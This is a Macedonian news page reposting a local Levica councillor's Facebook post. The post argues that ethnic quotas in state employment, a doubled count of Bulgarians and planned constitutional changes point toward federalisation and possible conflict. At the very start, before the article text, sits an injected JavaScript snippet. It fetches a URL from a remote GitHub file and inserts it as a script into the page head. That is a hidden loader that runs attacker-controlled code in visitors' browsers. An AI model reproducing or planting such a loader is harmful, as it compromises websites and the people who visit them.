;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Додека етникумот е предуслов за вработување нема да имаме нормален попис - Антропол
АктуелноЛокално

Додека етникумот е предуслов за вработување нема да имаме нормален попис

  • Фејсбук статус на Саше Јанчев – Советник од Левица во Општина Гевгелија.

Во Македонија нема да има нормален попис се дур не се укине добивањето државна работа, државни функции и делење на власта на национална основа, а тоа согласно законска предвидена процентуална застапеност и дур не се укинат национални партии.

Делбата на државниот апарат на национална основа не е карактеристика на граѓанско општество во унитарна држава, каде што пред закон секој е ист без разлика на нација, вера, раса и секој државјанин има еднакво право до државна позиција, се разбира врз основа на стручност и компетентност. Спротивно на ова, делбата на државен апарат по национална основа е пракса на федерални држави. И тука баш тоа е во игра.

Тоа особено е лесно денес да се каже од гледна точка на 2021 година. Денес приказната за угнетување и дискриминирање на Албанци кога 50% од министрите се Албанци едноставно не држи вода. Играта е да се има федералниот дел од колачот односно владиниот апарат кој се врзува со оние фамозни 20%.

Затоа ДУИ никогаш нема да дозволи попис во кој ќе има контрола врз попишувачки тимови на терен, во кој нема да се попишува дијаспора (нешто што никаде во свет го нема) и попис во кој јасно ќе бидат дефинирани документите кои треба да ги покажат лицата кои се попишуваат оти само вака можат, во случај да притреба, да прават фингерајка. Впрочем затоа и беше стопиран пописот од 2011, за што Ахмети доби кривична која никогаш нема да се реализира. Сега сето тоа го имаше, а и многу повеќе, и затоа ДУИ се согласи.

До тука ништо ново под македонското сонце. Тоа што е ново и што сите не го видоа е тоа што бројот на Бугари кој за разлика од пописот од 2002 сега е пораснат за повеќе од два пати. Тогаш имало 1 487, а со сегашниов попис со бугарска апликација има 3 504.

И ова е бројката со која сега ќе не убедуваат дека е европски да се смени Уставот и истите да станат уставна категорија. Нормално и тука не станува збор за малцински права ами станува збор за создавање терен за бугарски федерален дел од македонскиот колач. Се по праксата на ДУИ. Не џабе Османи го води процесот.

Нормално сеа ќе се разбуди целата северџанска прогресивна орда да не убедува како е тоа прогресивно, европски, напредно, а се со цел добивање датум и дека датумот значи отварање на рајски порти и цел тој џез што го гледавме за Преспански договор и за референдумот. Нема врска што датум веќе сто пати добивме и што преговорите после вистинско добивање датум може да траат 30 години со 100 шанси Бугарија и Грција пак да не блокираат. Ама сега ако не го смениме Уставот, потоп.

А менувањето на Уставот ќе биде се освен обично и нормално. Обично и нормално вметнување Бугари во Устав ќе биде кога прво ќе ги укинеме националните партии, кога ќе го укинеме основите за делење на државни работни места, функции и министерства на национална основа, кога Бугарија ќе признае македонски народ, македонски јазик и македонско малцинство. Тогаш ќе биде нормално и Бугарите да влезат во Уставот.

А до тогаш се е ова игра на федерализирање на Македонија која СДСМ и ДУИ активно ја водат, а врхушката на ВМРО ДПМНЕ тихо ја одобрува, а се во име на евроатлански интеграции и допадливост кај западните господари со цел да се дојде на власт.

И ништо од ова не би било страшно ако сето ова не значеше војна. Оти после федерализација доаѓа поделба, а секој обид за поделба на Македонија завршувал со крв до колена.

Затоа смирете страсти и памет во глава. Не чека жешко лето.

П.С и јас сум лице од административните извори.